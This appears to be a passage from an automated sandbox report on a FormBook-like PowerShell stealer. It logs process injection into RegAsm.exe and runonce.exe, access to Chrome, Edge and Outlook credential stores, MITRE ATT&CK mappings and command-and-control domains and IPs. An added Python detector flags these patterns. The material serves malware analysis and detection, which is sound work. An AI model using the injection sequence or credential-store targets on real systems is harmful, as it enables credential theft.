Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runonce.exe Thread register set: target process: 5464
Source: C:\Windows\SysWOW64\runonce.exe Thread APC queued: target process: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D63008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1757147183.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2610350344.0000000000F31000.00000002.00000001.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000000.1909963326.0000000001851000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\runonce.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\runonce.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
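Two of the behaviour groups in this report are worth turning into detection logic: the process-injection events near the top of the section (x.exe writing into RegAsm.exe at 400000, the conventional 32-bit PE image base, and 401000, followed by runonce.exe setting a thread context and queuing an APC in y85te3vqfc6QGAKyw78l.exe), and the credential-store accesses listed directly above (the SysWOW64 copy of runonce.exe opening Chrome and Edge "Login Data", "Cookies", "Web Data" and "Local State" files and the Outlook profile key). The Python below is an added example written for this page, not Joe Sandbox code and not part of the report. It parses lines in the report's text format (a constructed sample copied from this report, plus one benign chrome.exe line) and flags both patterns. The regexes, the 0x400000 image-base heuristic and the allowlist of expected accessor processes are the author's assumptions.

```python
"""Added example, not Joe Sandbox's code: parse behaviour lines in this report's
text format and flag the two FormBook patterns recorded above. Names marked
'assumption' are the author's choices, not anything the report defines."""
import re
from collections import defaultdict

# One report line: "Source: <process>.exe<event>: <detail>[Jump to behavior]";
# an optional " | " separator between process and event is also accepted.
EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)(?: \| )?"
    r"(?P<event>Memory written|Thread register set|Thread APC queued|"
    r"File opened|Key opened|Key value queried|Process created|"
    r"Queries volume information): (?P<detail>.*?)(?:Jump to behavior)?$"
)
MEMWRITE_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)$")
THREAD_RE = re.compile(r"^target process: (?P<target>.+)$")

# Assumption: 0x400000 is only the default 32-bit PE image base. A real
# detector should compare against the target's actual image base.
PE_IMAGE_BASE = 0x400000
CRED_STORE_SUFFIXES = ("\\Login Data", "\\Web Data", "\\Cookies", "\\Local State")
OUTLOOK_PROFILE_KEY = "\\Windows Messaging Subsystem\\Profiles\\"
# Assumption: the only processes expected to open those stores.
EXPECTED_ACCESSORS = {"chrome.exe", "msedge.exe", "outlook.exe"}

# Constructed sample: lines copied from this report's text export, plus one
# benign chrome.exe line to show the allowlist working.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D63008Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 5464Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exeJump to behavior
Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
"""


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Turn report lines into dicts with src, event, detail and, where the
    event names another process, target (path or PID) and write base."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        if ev["event"] == "Memory written":
            mw = MEMWRITE_RE.match(ev["detail"])
            if mw:
                ev["target"] = mw["target"]
                ev["base"] = int(mw["base"], 16)
        elif ev["event"].startswith("Thread"):
            tr = THREAD_RE.match(ev["detail"])
            if tr:
                ev["target"] = tr["target"]
        events.append(ev)
    return events


def find_injection(events):
    """Group cross-process writes and thread tampering by (source, target);
    keep pairs that overwrite the PE header or touch a remote thread."""
    evidence = defaultdict(list)
    for ev in events:
        if ev["event"] == "Memory written" and "base" in ev:
            what = "PE header overwritten" if ev["base"] == PE_IMAGE_BASE else "remote write"
            evidence[(ev["src"], ev["target"])].append("%s at 0x%X" % (what, ev["base"]))
        elif ev["event"].startswith("Thread") and "target" in ev:
            evidence[(ev["src"], ev["target"])].append(ev["event"])
    return {pair: why for pair, why in evidence.items()
            if any(e.startswith(("PE header", "Thread")) for e in why)}


def find_credential_access(events):
    """Return (process, artifact) for browser credential stores or the
    Outlook profile key opened by a process outside EXPECTED_ACCESSORS."""
    hits = []
    for ev in events:
        d = ev["detail"]
        if ev["event"] == "File opened" and "\\User Data\\" in d and d.endswith(CRED_STORE_SUFFIXES):
            artifact = d
        elif ev["event"] == "Key opened" and OUTLOOK_PROFILE_KEY in d:
            artifact = d
        else:
            continue
        if basename(ev["src"]) not in EXPECTED_ACCESSORS:
            hits.append((ev["src"], artifact))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE)
    for (src, target), why in find_injection(evs).items():
        print("INJECTION  %s -> %s: %s" % (basename(src), target, ", ".join(why)))
    for src, artifact in find_credential_access(evs):
        print("CRED-THEFT %s opened %s" % (basename(src), artifact))
```

Two caveats a practitioner should carry over to a real detector. First, the report identifies the target of "Thread register set" by PID (5464) but the target of "Thread APC queued" by path, so the example keys on whatever identifier the line carries rather than trying to join them; with EDR telemetry you would join on PID and process start time. Second, a remote write at 0x400000 is only suspicious because that is where the PE header of a default-linked 32-bit image lives; the strong signal is the combination seen here, a write at the target's real image base followed by a thread-context change or queued APC in the same target, which is the classic hollowing sequence.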

                Remote Access Functionality

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK matrix, one tactic per line. A number before a technique is the count shown on that cell of the matrix; techniques with no number were not matched by this sample.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 1 Exploitation for Client Execution; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 612 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 612 Process Injection
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 3 File and Directory Discovery; 113 System Information Discovery; 221 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1615024; Sample: LLLLLLLLASSSEERRRR.ps1; Start date: 14/02/2025; Architecture: WINDOWS; Score: 100. The graph is reproduced below as a process tree; the number in parentheses after a process is the count shown on its node.

                Sample start
                    Domains/IPs: www.seasay.xyz; www.l63339.xyz (Performs DNS queries to domains with low reputation); 5 other IPs or domains
                    Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
                    Started: powershell.exe (16); notepad.exe (5)
                powershell.exe (16)
                    Dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
                    Signatures: Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
                    Started: x.exe (3); conhost.exe
                x.exe (3)
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; 2 other signatures
                    Started: RegAsm.exe
                RegAsm.exe
                    Signatures: Maps a DLL or memory area into another process
                    Injected: y85te3vqfc6QGAKyw78l.exe
                y85te3vqfc6QGAKyw78l.exe (injected by RegAsm.exe)
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    Started: runonce.exe (13)
                runonce.exe (13)
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    Injected: y85te3vqfc6QGAKyw78l.exe
                    Started: firefox.exe
                y85te3vqfc6QGAKyw78l.exe (injected by runonce.exe)
                    Domains/IPs: www.seasay.xyz 103.106.67.112, ports 59020, 59021, 59022, VOYAGERNET-AS-APVoyagerInternetLtdNZ, New Zealand; www.lucynoel6465.shop 104.21.112.1, ports 59028, 59029, 59030, CLOUDFLARENETUS, United States; 3 other IPs or domains
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.